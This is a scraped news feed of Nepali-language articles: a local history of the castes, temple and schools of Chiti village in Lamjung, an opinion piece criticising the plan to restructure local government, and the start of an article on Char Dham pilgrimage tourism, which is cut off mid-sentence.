चितिमा पाण्डे र तिवारीको बाहेक अहिलेसम्म वशावली लेखिएको छैन । तर पनि कतिपय थरले आफ्नो वंशावली तयार गर्न खोजी कार्यमा लागेका छन । चिति तिलाहारमा सुरुमा बसोवास गर्ने चेपाङ जाति हुन भन्ने लोककथा भएपनि उनीहरू कुन समयमा बसेका हुन र पछि कहाँ गए भन्ने बारे कतै पाइदैन । चितिमा बसोवास गर्नेहरूमा पुर्वे बाह्मणहरूमा दवाडी, घिमिरे, बराल, ढकाल, लुइटेल, पौडेल, वाग्ले, रेग्मी र न्यौपाने रहेका छन । कुमाइ बाह्मणहरूमा तिवारी, बिष्ट, कमली, पन्त, पाण्डे, सिलवाल, सेडाई, गोल्ने, थपलिया, गौली र लौडारी रहेका छन । जनजातिहरूमा नेवार, घर्ती, गुरुङ, घले, तमाङ, लामा, मगर, खवास आदि रहेका छन भने क्षेत्रीहरूमा कुताल, बगाले, बस्नेत, भण्डारी, खड्का, खत्री र सुयल लगायत छन । तर आजभोलि अन्तरजाति विवाहले गर्दा बाह्मण जातिहरूबाट पनि क्षेत्री हुने क्रम बढ्दो छ । चितिमा दशनामीमा जोगी र कुवर(कमर) पनि छन । चितिमा दलितमा कामी, दमै र सार्कीहरूको पनि बसोवास छ । दलित भित्र पनि विभिन्न थरका जातिहरू छन ।
चितिमा भएका मठ मन्दिरहरूको कुने पुरातात्विक शिलालेख र ताम्रपत्र भेदिदैन । तर पनि  रामचोकको निशान गढी अर्थात कालिका मन्दिरको छुट्टै इतिहास रहेको छ । द्रव्य शाहले १६१६ सालतिर लिगलिगकोटको दौडमा लिगलिगकोट र माझकोट कब्जा गरी गोरखा राज्य खडा गरी राजा भए । द्रव्य शाह राजा भएकोमा दाजु नरहरि शाहलाई ईष्र्या भयो । भाई द्रव्य शाहले मेरै सरदारको रुपमा गोरखा विजय गरेकाले गोरखा माथी लमजुङकै अधिकार हुन्छ भनी खिचलो उठाए । द्रव्य शाह भने आफूले स्थापना गरेको गोरखा राज्यलाई लमजुङमा गाभ्ने पक्षमा थिएनन् । यसबाट नरहरि शाह र द्रव्य शाह बीच विवाद बढ्यो र आपसमा ठूलो शत्रुता भयो । लमजुङले द्रव्य शाहको हत्या गर्ने र गोरखामाथी आक्रमण गर्ने प्रयास समेत भयो तर सफलता भएन । दाजु भाइको बीचमा झगडा हँुदा आमा बसन्तावतीले चेपे नदीमा आफ्नो दुधको धारा बगाउँदै सीमा कायम गरेको इतिहास छ । त्यो बेला लिगलिगकोटदेखि लमजुङको गाउँशहर आउन द्रव्य शाहका सेनाहरू चेपे तरेपछि साइलीटार हुँदै प्याराजुङ, भार्ते भएर दोर्दी खोला तरि रामचोक बेसीको बाटो हिडने गर्दथिए । आफ्नो राज्यसंग लड्न आउने द्रव्य शाहका सेनालाई टाढा बाटनै देख्न सकियोस भनेर नरहरि शाहले चिति रामचोकमा निशान गढी निर्माण गर्न लगाएका थिए । जुन गढीमा अहिले निशान कालिकाको मन्दिर निर्माण भएको छ । अर्कोतर्फ नरहरि शाहको पालामा तिलाहारमा पनि कोट खडागरी पुजा चलाएका थिए । तिलाहारको कोटमा पुजा भएपछि गाउँशहरको कालिकामा पुजा हुने कुराको लोक कथन पनि छ । तिलाहारको कोट कालिकाको थानमा अहिले पनि रेग्मी थरका बाह्मणहरूले पुजा गर्दै आएका छन ।
इतिहासमा चिति गाउँको शिक्षाको विकास गुरुकुलबाट सुरु भएको हो । गुरुकुल शिक्षाको विकासले गाउँको सामाजिक चेतना, सामुदायिक सहयोग र समयानुसार शिक्षाप्रतिको आवश्यकता पहिचान हँुदै गयो । औपचारिक विद्यालय स्थापना हुनुभन्दा अघि चिति गाउँमा गुरु, पण्डितद्वारा वेद–पुराण, नीतिशास्त्र, व्याकरण, धर्मकर्म, संस्कृत भाषा तथा व्यवहारिक ज्ञान सिकाइने गर्थे । गुरुकुल शिक्षाले गाउँको पुरानो पुस्तालाई नैतिक मूल्य, सामाजिक जिम्मेवारी र धार्मिक संस्कारसँग जोडेर राख्यो । गाउँको खुला चौतारा वा निजी घरका छानोमुनी नै गुरुकुलका कक्षा थिए । त्यो बेला औपचारिक विद्यालय नभए पनि साक्षरता र संस्कार दुवैको संरक्षण गुरुकुलबाटै शुरु भएको थियो । राणाशासनको कालमा २००४ सालमा चितिमा भाषा पाठशाला स्विकृत पाएको थियो । त्यो बेलामा पं. टिका निधी खनाल हरिभक्त देवकोटा र नरहरि उपाध्यले भाषा पाठशालामा अध्यापन गराउनु भएको थियो । त्यो समयमा पाठशालाको भवन थिएन । त्यसैले गुरु जहाँ बस्नु हुन्थो त्यहि घरको धन्सार अथवा नजिकैको चौतारा कक्षा कोठा हुने गर्दथ्यो ।
२००८ सालमा पं. टीकानिधी शर्मा टेकनिधी तिवारीको पुरानो घरमा बस्नु हुन्थो । घुमन्ते पाठशाला चलाउदा धेरै असुबिधा भएकोले त्यहिबेला चितिमा पाठशाला भवन निर्माण गर्ने कुरा चल्न थाल्यो । टीकानिधी गुरुको डेरा नजिमको पाखामा पाठशाला निर्माण गर्न थालियो । तर जमिनका हकभोगको बारेमा गन्थे पाण्डे र खगनिधि तिवारी बीच जिवाद भयो । जमिनको विवादको कारण निर्माण कार्य स्थगित भयो । त्यसपछि पाठशाला आमडाँडाको चौतारोमा सञ्चालन भयो । पछि गुरु रामचोकमा बस्नु भएकोले पाठशालाको पढाइ पनि रामचोकमा हुन थाल्यो । रामचोकमा सञ्चालन भएको पाठशालाको भवन निर्माण गर्न १४÷१५ साल तिर झपिन्द्रराज बिष्टको अगुवाइमा सहयोग जुटाउने अभियान सुरु भयो । सहयोग माग्नको लागि पाठशालामा पढने बिद्यार्थी घर घरमा पुग्न थाले । सहयोग रकम नदिनेको घरमा सत्याग्रह समेत गर्न थाले । त्यो बेला पाठशाला निर्माणको लागि सहयोग नदिने गैराथोकका रविलाल पाण्डेको घरमा एक रात विद्यार्थीहरूले सत्याग्रह गरेको पनि इतिहास छ । उठेको रकमबाट नाङ्गेको पाखामा निर्माण भएको भवन पनि भत्कियो । त्यो भवनमा नर्मल तालिम प्राप्त शिक्षिका प्रेमकुमारी पन्तले पनि केहि समय पढाउनु भएको थियो ।
चिति गाउँमा भाषा पाठशालामा अध्यापन गर्न थालेपछि अंग्रेजीको पठन पाठन गर्नेक्रम सुरु भएको थियो । २०१० सालमा काठमाडौबाट भैरव प्रसाद लोहनीलाई अंग्रेजी पढाउन तिवारीडाँडामा लगियो । त्यतिबेला भैरव लोहनी मास्टर बुढा अर्थात गुरुले बैद्य डाँडाको बुधनिधिको धन्सारमा पढाउनु हुन्थो । त्यहि बेला स्याउतका कमल मूर्ती पन्तले २०११ सालमा आफ्नै घरको धन्सारमा सर्वोदय पुस्तकालयको स्थापना गर्नु भयो । त्यो पुस्तकालय अहिले शान्ती प्रा.वि.मा रहेको छ । त्यसैबेला भैरव गुरुको सहयोगमा तिवारीडाँडाका काठमाडौमा पढने विद्यार्थीहरूले पनि केही समय काठमाडौदेखि पुस्तक र पत्रपत्रिकाहरू ल्याएर चितिमा पढ्ने सुबिधा भएको थियो । तर पनि त्यो बेला संस्कृत शिक्षा मात्र होइन अब अंग्रेजी शिक्षा पनि पढ्न पर्दछ भन्ने भावनाको विकास हुन थाल्यो । ०१७ सालमा राजा महेन्द्रको पैदल यात्रा पोखरा तिर थियो । त्यहि समय पारी भैरव प्रसाद लोहनी र केहि विद्यार्थीसमेतले चितिमा मिडिल स्कूल माग गर्न राजाको सवारी भएको बाटो तार्कुघाट पुगेका थिए । त्यो बेला राजालाई भैरव लाहनीद्वारा रचना गरिएको कविता समेत राजालाई सुनाइयो । चितिका विद्यार्थीहरूलाई राजाबाट सवारी क्याम्प पोखरामा बोलाबट भयो । पछि राजाको सवारी क्याम्प पोखरामा जान भैरव लोहनी र कृष्णबाबु तिवारी जान लाग्दा सिउँडीबारमा पुग्दा गुरु बिमारी भएर फिर्ता हुनु भयो । यो बेला पनि चितिमा मिडिल स्कूल खोल्ने सपना पुरा भएन ।
अंग्रेजी शिक्षाको मोह स्याउत गाउँमा पनि भएछ । कोमलराज पाण्डेको घरमा पढाउने क्रममा खुदीमा खुलेको ग्राम विकास केन्द्रबाट स्याउतमा प्राइमरी स्कूलको स्विकृति भएछ । स्कूल स्विकृति भएपछि गोरखाका रामलाल श्रेष्ठ र रामेश्वर मरहठ्ठाले पढाउनु भएछ । यसरी प्राइमरी स्कूल स्विकृति भएपनि गाउँमा भाषा पाठशाला भने रोकिएको थिएन । गाउँका साना केटाकेटीहरूलाई अक्षर चिनाउने काम तिलाहारका लक्ष्मीप्रसाद वाग्ले गुरुले गर्नु हुन्थो । ०१७ सालमा चिति आमडाँडामा पनि भाषा पाठशालास समावेस गरी महेन्द्र प्राइमरी स्कूल सञ्चालन भयो । भवन निर्माण गर्न पं. मुरारीदत्त पन्तले जग्गा दान दिनु भयो । तिवारी डाँडा, बिष्टथर र हटियाका सबै शिक्षा प्रेमीहरूको सहयोगमा स्कूलको भवन पनि बन्यो । तर केही समयपछि स्कूलको भवन भत्कियो र पठनपाठन पनि बन्द भयो । पछि महेन्द्र प्राइमरी स्कुल सञ्चालन भएको जमिनमा २०२७ सालमा शिक्षक रुद्रनिधी तिवारीले आमडाँडामा युवाज्योती प्रा.वि. सञ्चालनमा ल्याउनु भयो ।  अर्कोतर्फ ०१९ सालमा टेकनिधि तिवारीका जेठा छोरा रामबाबु तिवारीले तिलाहारमा स्वयम्सेवा दिने उद्देश्यले प्राइमरी स्कूल सञ्चालन गर्नु भयो । स्कूल सञ्चालन गर्नको लागि समाजसेवी हर्कबहाुर बिष्टले जमिन दिएर सहयोग गरे । तिलाहारमा पाठशाला खुलेपछि खानेपानीको समस्या भयो । त्यो बेला हर्कबहादुर बिष्टको सक्रियतामा माटोको ध्वाङ् अर्थात पाईप कुमालेहरूबाट बनाउन लगाएर चिसापानीदेखि करिव डेड किलोमिटरको दुरीबाट तिलाहारमा खानेपानी ल्याइएको थियो । त्यो माटोको पाइप ठाउँ ठाउँमा फुट्न थालेपछि पुन बासको घनालाई बीच बीचका आँखालाई छिनोले खोली खानेपानीको समस्या धमाधान भयो । पछि २०२३ सालमा रुद्रनिधि तिवारीको अगुववाईमा युनिसेफले दिएको जिआई पाईप पालुङटारदेखि विद्यार्थीहरू र गाउँलेद्वारा बोकेर ल्याई पुनः त्यो खानीपानीलाई निरन्तरता दिइएको थियो । चितिमा खानेपानीको योजनाको यो नै पहिलो हो ।
चितीमा घरमै गुरु राखेर अंग्रेजी शिक्षाको पठन पाठन हुन थालेपछि हाई स्कुलको आवश्यकता महसुस हुन थाल्यो । अंग्रेजी शिक्षा पढाउनु पर्दछ भनेर तिवारी डाँडाका पुष्पनिधि तिवारीले २०१८ सालमा काठमाडौदेखि भैरवदत्त लोहनीलाई ल्यायर आफ्नै घरमा अंग्रेगी शिक्षा पढने इच्छुक सबै बावालिकाहरूलाई पढने अवसर दिनु भएको थियो । तर हाई स्कूल सञ्चालन गर्न तिवारीडाँडा, रामचोक, स्याउत र कार्कीडाँडाको बीचमा विवाद थियो । तिवारीडाँडा र रामचोकका मानिसले आमडाँडामा हुनपर्छ भन्ने, कार्कीडाँडाकाले आफ्नै गाउँमा र स्याउतकाले मिडिलस्कूल सञ्चालन भएको आफ्नै गाउँमा हुनु पर्दछ भन्ने तर्क राख्दा हाई स्कुल तिलाहारमा राख्ने बारे गाउँमा एक मत हुन सकेको थिएन । त्यसैबेला सर्वोच्च अदालतका अतिरिक्त न्यायाधीश लोकराज जोशी सेवा निवृत्त भएर आफ्नो गाउँ कार्कीडाँडामा स्कूल सञ्चालन गर्नका लागि गुठीसमेत राखेर थिए । कार्कीडाँडामा स्कूल सञ्चालन भएपछि न्यायाधीश लोकराजलाई पनि चितिमा हाइ स्कूलको आवश्यकताको महसुस भयो । त्यसपछि हाई स्कुल सञ्चालन गर्ने काममा लोकराज जोशी अतिरिक्त न्यायाधीश भएर होइन समाजका साझा अभिभावक भएर प्रस्तुत भए । न्यायाधीश लोकराज जोशीको अगुवाइमा सबै गाउँका प्रतिनिधि, वडाका अगुवा, बुद्धिजीवी, किसान र युवाहरूको भेलाले तिलाहारमा हाइस्कुल बनाउने निर्णय भयो । त्यसको लगतै २०२१ साल पौष १ गतेदेखि जनकल्याण हाई स्कुल सञ्चालन भयो । हाई स्कुलको लागि हर्कबहादुर बिष्टले प्रदान गर्नु भएको, जहाँ रामबाबु तिवारीले प्राथमिक विद्यालयको लागि जग खनेका थिए, त्यही ठाउँमा कच्ची खरको छानाको टहरा निर्माण गरी कक्षा सञ्चालन भयो । त्यो बेला हाई स्कुलमा पढाउन काठमाडौमा अध्यन गर्ने नूतननिधि तिवारी, यज्ञनिधि तिवारी, लक्ष्मणराज बिष्ट, कृष्ण बाबु तिवारी, शेषनिधि तिवारी, पीताम्वर जोशी लगायतले आफ्नो अध्ययन स्थगित गरी अध्यापन कार्यमा लागे । यसैगरी तर्कशाली पन्त र लक्ष्मी प्रसाद वाग्लेले पनि अध्यापन कार्यमा लाग्नु भयो भने बटुकराज बिष्टले विद्यालयको प्रशासनिक काम गर्नु भयो । सुरुमा भद्र पाण्डेले विद्यार्थीहरूलाई बैशबोटको पानी बोकेर खुवाउनु भयो ।
तिलाहारमा हाई स्कुलको भवन बनाउन २०२४ सालमा सुरु भयो । १८४ हात लामो स्कुलको भवन निर्माण गर्ने त्यो बेलाका दक्षकर्मी कार्कीडाँडा निवासी सेते कामी अर्थाल काइलो कामी थिए । भवनको शिलन्यास रामचोकका डिल्लीध्वज पन्त जो अंग्रेजी शिक्षा र कपाल बंगाली काटनेहरूको बिरोध गर्दथे, उनैबाट भयो । स्कुलको भवन बनाउन कुनै सरकारी बजेट थिएन । चितिका आमडाँडा र तिलाहार गाउँ पञ्चायत मात्र नभएर त्योबेला ढोडेनी, फलेनी, बाह्रथर, टक्सार, उदिपुर बाजखेत, बन्सार सिख्र लगायत पञ्चायतले पनि श्रमदान गरेका थिए । स्याउत जाने बाटोमा पर्ने दाह्रेगौडामा ढुङाको खानी बनायर महिनौं दिनसम्म हाईस्कुलका लागि मानिसहरूले ढुङ्गा बोकेको इतिहास छ ।
चितिको पहिलो औपचारिक रुपमा स्विकृत प्राप्त विद्यालय शान्ती भवन मिडिल स्कुल स्याउतको हो । त्यो विद्यालय २०१५ सालदेखि पठन पाठन सुरु भै २०१७ मा स्विकृत भएको थियो । त्यसपछि ०२१ सालमा तिलाहरमा जनकल्याण मावि हुँदै लोकराज मा.वि. र बाल विकास मा.वि.समेत अहिले ३ वटा मा.वि. रहेका छन भने जनजागृत आधारभुत विद्यालयदेखि बजारखुट्टा, तीनपिप्ले, आमडाँडा, स्याउत, रामचोक र बस्नेत गाउँसमेत गरी ६ वटा गाउँमा प्राथमिक विद्यालय सञ्चालनमा छन । रामचोक बेसीको बाल विकास माध्यमिक विद्यालय २०४४ सालमा प्रा.वि. सञ्चालन भै ०६६ सालमा निमावि र ०७८ सालदेखि माविको कक्षा सञ्चालन हुँदै आएको हो । चितिमा निजी क्षेत्रबाट न्यू मेरिगोल्ड बोडिङ पनि सञ्चालनमा छ । रामचोक बेसीमा मानिसहरूको बसोवास सुरु भएको करिवन ५० बर्ष भयो । बसोवास बढ्दै जाँदाबेसीमा पनि स्कुलको आवश्यकता महसुस भयो । विद्यालय निर्माणको काम वास्तवमै चुनौतीपूर्ण काम थियो । विद्यालय निर्माणमा धेरै कठिनाइहरू हुन्छ । तर पनि रामचोक बेसीका आम जनताले गाउँमा विद्यालय स्थापना गर्न सके । २०४४ सालमा प्रा.वि. सञ्चालन भएको बाल विकास माध्यमिक विद्यालयले अहिले ३८ बर्ष पार गरेको छ । सामुदायिक विद्यालयको विकासमा दाताहरूको योगदान अत्यन्त महत्वपूर्ण हुन्छ । रामचोक बेसीका जनताले कतिले भवन निर्माणको लागि जमिन भवन निर्माणको लागि आर्थिक सहयोग, खेलसामग्री, छात्रवृत्ति वा प्रविधि उपकरण उपलब्ध गराएका छन । यसरी शिक्षाको विकासका लागि रामचोक बेसीका जनताले गरेको सहयोग विद्यालय प्रतिको विश्वास हो ।
चिति गाउँमा शिक्षाको विकास पुर्खाको त्याग, पसिना र सामूहिक चेतनाको साक्षी बनेको लामो यात्रा हो । चिति गाउँमा विद्यालय स्थापित गर्ने क्रममा कसैले आफ्नै खेतीयोग्य जमिन दियो, कसैले घरमा बचत गरिएको पैसा चन्दा राख्यो, कसैले मज्दुरी गरेर आएको कमाइ विद्यालयलाई समर्पण गरिदिए । कसैले ढुङ्गा काठ, बालुवा बोकेर श्रमदान गरे । आज विद्यालय स्थापना गर्दा जमिन दान गर्ने, ढुङ्गा बोक्ने, चन्दा उठाउने, विद्यार्थी बटुल्ने ती पुराना मान्छेहरू धेरैजना अब भौतिक रुपमा छैनन । अर्कोतर्फ धेरैजना बुढेसकालका कारण ओझेल परिरहेका छन । केहीका नाम अभिलेखमै हराइसके, केहीका नाम गाउँलेहरूलाई सम्झिन मुस्किल भइरहेको छ । तर इतिहासको आँखाले योगदानलाई कहिल्यै बिर्सँदैन । मान्छे मर्छन, तर उनीहरूले रोपेका बीउहरू पुस्तौँसम्म उम्रिरहन्छन । चितिका ती पुराना बुद्धिमान, त्यागी र श्रमजीवी मानिसहरू आज देखिएको प्रत्येक विद्यालयको हरेक भवन, पर्खालमा, आँगनमा, घण्टीको आवाजमा, र बालबालिकाको खुशीमा जीवित छन ।
आज चितिका विद्यालयहरू केवल ‘पढने ठाउँ मात्र होइनन् । समुदायको सामूहिक सपना र संघर्षका प्रतीक बनेका छन । चिति गाउँका ती शिक्षा–प्रेमी महानुभावहरू, जसले जीवनभर गरेको त्यागपछि न त आफैँले सम्मान खोजे, न त आफ्नो कामलाई इतिहासमा लेखाउन माग गरे ! आज उनीहरू चितिका विद्यालयहरूकै रुपमा, बालकहरूको सपनामा, शिक्षकहरूको कर्ममा र समुदायको सामूहिक चेतनामा अमर भएर बसेका छन ।’
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49167 0
स्थानीय तह पुनःसंरचना : कस्को राज्य, कसका लागि ? https://www.antaranganews.com/?p=49025 https://www.antaranganews.com/?p=49025#respond Wed, 27 May 2026 03:08:58 +0000 https://www.antaranganews.com/?p=49025 संघीय सरकारले गाउँपालिका, नगरपालिका र वडाहरूको संख्या तथा सिमाना हेरफेर गर्न ल्याएको प्रारम्भिक मस्यौदा केवल प्रशासनिक पुनर्संरचनाको विषय होइन । यो राज्यसत्ता, स्रोत वितरण, वर्गीय नियन्त्रण र जनअधिकारसँग गाँसिएको गम्भीर राजनीतिक प्रश्न हो । त्यसैले यसलाई ‘कसको’ र ‘कसका लागि पुनः संरचना ?’ भन्ने मूल प्रश्नबाट नै मूल्यांकन गर्न आवश्यक छ ।
राज्यलाई सामान्यतः सम्पूर्ण समाजको साझा प्रतिनिधि मानिए पनि व्यवहारमा त्यो आर्थिक रूपमा प्रभुत्वशाली वर्गको राजनीतिक औजार हो । यही कारण स्थानीय तह पुनर्संरचनाको बहस पनि केवल प्राविधिक होइन, राजनीतिक चरित्रको विषय बनेको छ । प्रश्न उठ्छ— यो पुनर्संरचना जनताको सेवा सहज बनाउनका लागि हो, वा सत्ता, बजेट र स्रोतलाई नयाँ ढंगले नियन्त्रण गर्ने अभ्यास ?
यदि पुनर्संरचना जनताको सहभागिताविना, माथिबाट आदेशात्मक ढंगले गरिन्छ भने त्यसले जनमुखी सुधार होइन, केन्द्रीकृत सत्ता सुदृढ गर्ने शासक वर्गीय पुनर्गठनको रूप लिन्छ । संघीयताको मूल मर्म जनताको घरदैलोमा सत्ता पु¥याउने हो, तर निर्णय पुनः केन्द्रमै सीमित भयो भने त्यसले ‘सिंहदरबारमुखी शासन’लाई नै पुनर्जीवित गर्छ ।
‘जनताबाट सिक, जनतामा फर्क’ भन्ने सिद्धान्त केवल राजनीतिक नारा होइन, लोकतान्त्रिक शासनको आधारभूत मूल्य हो। कुनै पनि नीति जनताको अनुभव, आवश्यकता र सहभागितामा आधारित नभएसम्म दीगो हुन सक्दैन । त्यसैले स्थानीय तह पुनर्संरचना जनताको भावना, भौगोलिक यथार्थ र सामाजिक विविधताबाट टाढा जानु हुँदैन ।
स्थानीय तह केवल प्रशासनिक इकाइ मात्र होइन; यो ऐतिहासिक बस्ती, भाषा, संस्कृति र सामूहिक पहिचानको जीवित भूगोल हो। हिजोका गाउँ बस्ती, सभ्यता बोकेका क्षेत्र, जातीय–सांस्कृतिक बसोबास र स्थानीय जीवनपद्धतिले निर्माण गरेको पहिचानलाई बेवास्ता गरिँदा त्यसले केवल प्रशासनिक होइन, सांस्कृतिक असन्तोष पनि जन्माउँछ । नामाकरणदेखि संरचना परिवर्तनसम्मका निर्णयहरू जनताको ऐतिहासिक चेतना र भावनासँग मेल खानु आवश्यक छ ।
नेपाल बहुभाषिक, बहुजातीय र बहुसांस्कृतिक देश हो । त्यसैले पुनर्संरचनाको आधार केवल जनसंख्या वा राजस्व होइन; सांस्कृतिक निरन्तरता, भाषिक पहिचान र ऐतिहासिक सहअस्तित्व पनि हुनुपर्छ । विशेषतः आदिवासी जनजाति समुदायका लागि भूगोल केवल बसोबास होइन, उनीहरूको अस्तित्व र पहिचानसँग गाँसिएको जीवनक्षेत्र हो । त्यसलाई टुक्र्याउने वा कमजोर बनाउने कुनै पनि निर्णयले संघीयताको आत्मामाथि प्रश्न उठाउँछ ।
त्यसैगरी हिमाल, पहाड र तराई, दुर्गम, दुर्गमक्षेत्र तथा पिछडिएका क्षेत्रहरूका लागि स्थानीय सरकार राज्यसँग जोडिने मुख्य माध्यम हो । ‘कम जनसंख्या’ वा ‘कम राजस्व’को आधारमा सेवा केन्द्र टाढा सार्ने वा संरचना गाभ्ने निर्णयले पहुँच झन् कमजोर बनाउने जोखिम हुन्छ । विकासको नाममा हुने यस्तो प्रक्रिया अन्ततः असमानता गहिर्याउने साधन बन्न सक्छ ।
विकासको वास्तविक मापन भवन, सडक वा कार्यालयको आकार होइन; नागरिकको जीवनस्तरमा आएको परिवर्तन हो। उत्पीडित वर्ग— किसान, मजदुर, दलित, महिला र सीमान्तकृत समुदाय— को पहुँच घटाएर बनाइने ठूलो संरचना लोकतन्त्र होइन, नियन्त्रणको नयाँ स्वरूप मात्र हो ।
पुनर्संरचनाले कम्तीमा तीन प्रश्नको स्पष्ट उत्तर दिनुपर्छ :
के यसले जनताको पहुँच बढाउँछ ?
के यसले सहभागिता र निर्णय अधिकार विस्तार गर्छ ?
के यसले केन्द्रीकरण कमजोर बनाउँछ वा बलियो ?
यदि उत्तर सकारात्मक छ भने मात्र पुनर्संरचना प्रगतिशील मान्न सकिन्छ । अन्यथा यो संघीयताको नाममा नयाँ केन्द्रीकृत संरचना निर्माण गर्ने प्रयास मात्र हुनेछ ।
नेपालको संघीयता लामो संघर्ष र पहिचानको आन्दोलनबाट प्राप्त उपलब्धि हो । त्यसैले कुनै पनि पुनर्संरचना त्यस ऐतिहासिक मर्मविपरीत जानु हुँदैन । मधेश, कर्णाली, हिमाली तथा आदिवासी बहुल क्षेत्रहरूको अनुभवले देखाएको छ— सत्ता विकेन्द्रीकरण बिना समान विकास सम्भव हुँदैन ।
अन्ततः प्रश्न संख्या वा सीमाको होइन; प्रश्न सत्ता कसको हातमा रहने भन्ने हो। यदि सत्ता जनताको हातमा पुग्छ भने सानो वडा पनि प्रभावशाली हुन्छ । तर यदि सत्ता दलाल, नोकरशाह र सीमित अभिजात वर्गको नियन्त्रणमा रहन्छ भने ठूलो पालिका पनि जनताका लागि सास्तीको संरचना बन्न सक्छ ।
स्थानीय तह पुनर्संरचना जनताको जीवन सहज बनाउने साधन बन्नुपर्छ, न कि जनअधिकार कमजोर पार्ने औजार । यही नै संघीयताको वास्तविक परीक्षा हुनेछ ।
(लेखक : नेपाली कम्युनिष्ट पार्टीको केन्द्रीय सदस्य हुनुका साथै लमजुङ इन्चार्जसमेत हुनुुहन्छ । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=49025 0
इतिहासको खोज : पर्यटन र चारधामको यात्रा   https://www.antaranganews.com/?p=48974 https://www.antaranganews.com/?p=48974#respond Mon, 25 May 2026 11:52:56 +0000 https://www.antaranganews.com/?p=48974 पर्यटनको क्षेत्रमा धार्मिक अथवा आध्यत्मिक उद्देश्यले गरिने यात्रा तीर्थाटन पर्यटन हो । धार्मिक पर्यटनको सुरुवात मानव सभ्यताको प्रारम्भिक कालदेखि भएको मानिन्छ । मानिसहरूले जबदेखि धार्मिक विस्वासहरू विकास गर्न थाले त्यही समयदेखि तीर्थाटनमा यात्रा गर्न थालेका हुन । तीर्थाटन पर्यटनको मुल उद्देश्य भनेको आफ्नो धर्म अनुसार कुनै पनि पवित्र स्थल मन्दिर, मस्जित, चर्च, गुम्वा, स्तूप आश्रम लगायतका स्थानमा पुगि पुजा आजा र दर्शन गर्नु हो ।
हिन्दू परम्परामा चारधाम यात्रा विशेष मानिन्छ । चारधाम केवल धार्मिक यात्रामा सीमित छैन, यसले सभ्यता, संस्कृति, भूगोल, आस्था, राजनीति र इतिहासलाई एकै सूत्रमा गाँसेको छ । नेपालबाट हरेक वर्ष हजारौं तीर्थयात्री भारतको चारधाम पुग्नुको कारण नेपालमा तीर्थ नभएर होइन । यसको पछाडि साझा सनातन संस्कृति, पुराण परम्परा, मनोविज्ञान र ऐतिहासिक सम्बन्ध लुकेको छ । शाब्दिक अर्थमा चारधाम भनेको हिन्दू धर्मका चार प्रमुख पवित्र तीर्थस्थल हुन । आदि शंकराचार्यले भारतका चार कुनामा चार धाम स्थापना गरे । पूर्वमा जगन्नाथ पुरी, पश्चिममा द्वारका, उत्तरमा बद्रीनाथ र दक्षिणमा रामेश्वर । यी चार धामले समग्र भारतलाई धार्मिक एकतामा बाँधेको प्रतीक मानिन्छ । अहिले भने उत्तराखण्डका यमुनोत्री, गंगोत्री, केदारनाथ र बद्रीनाथलाई पनि चारधाम भन्ने चलन छ । उत्तराखण्डलाई देवभूमि भनिन्छ । जीवनमा एकपटक चारधाम दर्शन गरे पुण्य प्राप्त हुने जनविश्वास छ ।
नेपालका हजारौं तीर्थयात्री उत्तराखण्डको चारधाममा पुग्छन । यो यात्रा मोक्षको मार्ग मात्र होइन, साहस, प्रकृति र आत्मिक अनुभूतिको संगम पनि हो । हिमपातका कारण यी मन्दिर वर्षभरि खुल्दैनन् । वैशाख– जेठमा ढोका खुल्छ, कार्तिक– मंसिरमा बन्द हुन्छ । हिन्दू मान्यतामा चारधाम दुई किसिमले चिनिन्छ । उत्तराखण्डको यमुनोत्री, गंगोत्री, केदारनाथ, बद्रीनाथ र भारतका चार कुनाका बद्रीनाथ, जगन्नाथ, रामेश्वर, द्वारका । यी सबै स्थान भारतका विभिन्न प्रदेशमा छरिएका छन । नेपालबाट भारतको चारधाममा जाने कारण तीर्थ नभएर होइन । मुख्य कारण साझा सनातन सभ्यता, पुराण, धार्मिक मनोविज्ञान र ऐतिहासिक प्रतिष्ठा हो । नेपाल र भारतको सम्बन्ध साझा धार्मिक सभ्यताको हो । नेपालका देवता भारतसँग जोडिएका छन, भारतका पुराण नेपालसँग । हिमालयदेखि गंगासम्म एउटै धार्मिक कल्पना विकसित भएको छ । पशुपतिनाथ र केदारनाथबीच आध्यात्मिक सम्बन्ध मानिन्छ । जनकपुरधाम र अयोध्या राम–सीताको सम्बन्धले जोडिएका छन । मुक्तिनाथ र बद्रीनाथलाई वैष्णव परम्परामा परस्पर पूरक मानिन्छ । त्यसैले भारतीय तीर्थ नेपालीका लागि आफ्नै धार्मिक भूगोलको विस्तारजस्तो लाग्छ । हिन्दू पुराण, उपपुराण र आख्यान भारतकेन्द्रित भूगोलमा रचिएका छन । गंगा, यमुना, काशी, प्रयाग, बद्रीनाथ, केदारनाथलाई मोक्षदायी क्षेत्र भनिएको छ । सदियौंदेखि सुन्दै आएको धार्मिक चेतनाले ती स्थानप्रति गहिरो श्रद्धा जन्माएको छ । चारधाममा हिमाल, नदी, तपोभूमि, ऋषिमुनिका कथा, गुफा र आश्रमले यात्रालाई आध्यात्मिक बनाउँछ ।
नेपालका हिमाली तीर्थहरू पनि अत्यन्त शक्तिशाली छन तर भारतीय चारधामसँग जोडिएका हजारौँ वर्षका आख्यान र अखिल हिन्दु जगतमा फैलिएको प्रतिष्ठाले ती स्थानलाई विश्वव्यापी धार्मिक केन्द्र बनाएको छ । तर नेपालमा पनि तीर्थस्थलको कमी छैन । त्यसो भए किन भारतकै चारधाम लोकप्रिय ? धार्मिक ब्रान्ड र ऐतिहासिक प्रचार भारतीय चारधाम हजारौँ वर्षदेखि हिन्दु समाजमा प्रचारित छन । पुराण कथा मठ–मन्दिर परम्परा साधुसन्त टेलिभिजन चलचित्र धार्मिक संस्था यी सबैले चारधामलाई महातीर्थ बनाएका छन । नेपालका तीर्थस्थल भने अन्तर्राष्ट्रियस्तरमा पर्याप्त प्रचार हुन सकेका छैनन । भारतले चारधाम यात्रामा ठूलो पूर्वाधार निर्माण गरेको छ । सडक, हेलिकोप्टर सेवा धर्मशाला डिजिटल दर्ता प्रचार अभियान यसले यात्रालाई व्यवस्थित र आकर्षक बनाएको छ । नेपालमा अझै धेरै तीर्थस्थलमा सडकको समस्या प्रचारको कमी व्यवस्थापन र अनुसन्धान अभाव देखिन्छ । चारधाम यात्रा धार्मिक प्रतिष्ठासँग पनि जोडिएको छ । धेरै वृद्धवृद्धाले जीवनको अन्तिम धार्मिक यात्रा 